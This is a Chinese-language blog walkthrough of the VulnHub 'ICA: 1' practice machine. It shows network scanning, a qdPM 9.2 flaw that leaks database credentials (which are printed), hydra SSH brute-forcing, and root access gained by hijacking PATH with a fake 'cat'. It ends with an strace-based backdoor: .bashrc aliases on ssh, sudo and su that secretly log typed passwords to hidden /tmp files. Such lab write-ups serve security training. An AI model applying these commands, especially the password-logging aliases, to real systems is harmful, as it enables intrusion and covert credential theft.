靶机下载地址:https://www.vulnhub.com/entry/ica-1,748/
教程链接地址: https://blog.csdn.net/weixin_44830645/article/details/123520118

# 确认攻击目标

攻击机 KALI: 192.168.31.135
靶机 ICA:桥接于 192.168.31.1 的网卡,ip 未知

1)arp 确定靶机地址
sudo arp-scan -l

Image

-> 目标机器的 ip 地址: 192.168.31.50

  1. 确认靶机 ip 开放的端口信息
    sudo nmap -A -p- 192.168.31.50 -oN /tmp/ica.txt
Image

-> 靶机开放端口 21, 80, 8080

# qdpm9.2 漏洞寻找

1 )打开网址 http://192.168.31.50

Image

发现版本号 qdpm9.2 直接搜索 exp

Image

在 exploit-db 上找到了可以利用的 poc

Image

访问网址:http://192.168.31.50/core/config/databases.yml

Image

-> 得到数据库用户名:qdpmadmin 密码:UcVQCMQk2STVeS6J

# mysql 寻找敏感信息

mysql -h 192.168.31.50 -u qdpmadmin - p

Image

可以用 Navicat 进入数据库

Image

也可以登陆到服务器之后对这些表进行查看

Image

-> 找到一些 base64 加密后的密码以及一些用户名

# hydra 爆破密码

将用户名和解密后的密码加载到本地

Image
1
2
# 用hydra破解:
hydra -L user.txt -P pass.txt ssh://192.168.31.50
Image

# 服务器信息收集

Image

寻找是否有可利用的 s 权限的文件

Image

# 篡改环境变量提权

strings 命令用于查看二进制文件中可打印的字符

Image

发现 /opt/get_access 会执行 cat 命令
因此可以伪造 cat 命令,修改环境变量,使 get_access 执行一个伪造的 cat

1
2
3
4
export PATH=/tmp:$PATH
echo ‘/bin/bash’ > /tmp/cat
Chmod +x /tmp/cat
/opt/get_access
Image

# strace 后门

1
2
3
4
5
6
7
8
9
10
11
12
13
# 查看是否存在其他的strace监控键盘记录,有的话通过kill - 9 id删掉
alias | grep ssh && ps -ef | grep strace

# 修改环境变量
cat >> ~/.bashrc << EOF
alias ssh='strace -f -e trace=read,write -o /tmp/.ssh-`date +%d%h%m%s`.log -s 32 ssh'
alias sudo='strace -f -e trace=read,write -o /tmp/.sudo-`date '+%d%h%m%s'`.log -s 32
sudo'
alias su='strace -f -e trace=read,write -o /tmp/.su-`date '+%d%h%m%s'`.log -s 32 su'
EOF

# 运行环境变量
source ~/.bashrc
Image
1
2
3
4
5
# 监听/tmp文件下新增的.ssh文件
watch -n1 ls -Alh /tmp

# 找出此阶段内登陆到此服务器的密码的记录,无论正确与否都会被监听
cat /tmp/.ssh-09May051652090355.log
Image

-> strace 后门监控键盘有失败的时候,原因未知

更新于 阅读次数

请我喝[茶]~( ̄▽ ̄)~*

.N1h1l157 微信支付

微信支付

.N1h1l157 支付宝

支付宝

.N1h1l157 贝宝

贝宝